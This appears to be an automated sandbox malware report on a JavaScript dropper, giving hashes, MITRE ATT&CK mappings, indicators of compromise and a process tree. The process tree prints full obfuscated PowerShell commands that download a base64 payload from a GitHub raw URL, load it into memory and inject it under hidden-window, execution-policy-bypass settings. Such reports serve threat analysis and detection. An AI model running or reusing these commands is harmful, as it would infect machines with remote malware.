9eb68fe0683e79b88e4b37a2b038336192b516c5f975bf8636dc1565432bbdbc

General

Target

scan_374783.js
Size

3KB
MD5

c6b0c8c717d6f6b0fc0747c349821280
SHA1

e7b0686c4eebc8285ae5a2eb2c70a602b451b0d6
SHA256

9eb68fe0683e79b88e4b37a2b038336192b516c5f975bf8636dc1565432bbdbc
SHA512

434a2c6fe2ff42715e1ea6807e37d40852aab4ce0cac8af7ddd52327f503c72eb5544f221c15080b341942f6a79b9279679dbb04fa8216e2d5616c53df0fcac7

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	2876	wscript.exe
4	2876	wscript.exe
8	2796	powershell.exe
9	2796	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2756	powershell.exe
2796	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
9	raw.githubusercontent.com
7	raw.githubusercontent.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2756	powershell.exe
2796	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2876 wrote to memory of 2756	2876	wscript.exe	30
PID 2876 wrote to memory of 2756	2876	wscript.exe	30
PID 2876 wrote to memory of 2756	2876	wscript.exe	30
PID 2756 wrote to memory of 2796	2756	powershell.exe	32
PID 2756 wrote to memory of 2796	2756	powershell.exe	32
PID 2756 wrote to memory of 2796	2756	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\scan_374783.js
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGwAQQBjAGUAIAAgACgAWwBDAGgAYQBSAF0ANgA2ACsAWwBDAGgAYQBSAF0ANAA4ACsAWwBDAGgAYQBSAF0ANQA2ACkALABbAEMAaABhAFIAXQAzADYAIAAgAC0AUgBlAFAAbABBAGMAZQAgACAAKABbAEMAaABhAFIAXQA4ADQAKwBbAEMAaABhAFIAXQA1ADIAKwBbAEMAaABhAFIAXQAxADIAMQApACwAWwBDAGgAYQBSAF0AOQAyACkAfAAuACgAIAAoAFsAcwBUAFIAaQBuAEcAXQAkAFYAZQBSAEIAbwBTAGUAcAByAGUARgBlAHIARQBOAGMAZQApAFsAMQAsADMAXQArACcAWAAnAC0ASgBPAGkAbgAnACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
4ff4586488ee869a65565e8dc126786f

SHA1
0eae8bc002a08be3922449a452dfeaae13f35f85

SHA256
19f209d71bf365bac8cea4c645b16ca0ff761f2d82f6f3b6f50b23edeacc3c5b

SHA512
66c5efcb0b876e0df3f21b1d977ef8d2db89552bde4fb7ed9fb1472144104ea2210f82d3bd652d38b6fcaff5991f4050e7a26a9f73c071fe21ef62d1d09e2018

Download Submit
memory/2756-4-0x000007FEF50CE000-0x000007FEF50CF000-memory.dmp

Filesize
4KB

Download
memory/2756-5-0x000000001B2B0000-0x000000001B592000-memory.dmp

Filesize
2.9MB

Download
memory/2756-6-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/2756-7-0x000007FEF4E10000-0x000007FEF57AD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-13-0x000007FEF4E10000-0x000007FEF57AD000-memory.dmp

Filesize
9.6MB

Download
memory/2756-14-0x000007FEF4E10000-0x000007FEF57AD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing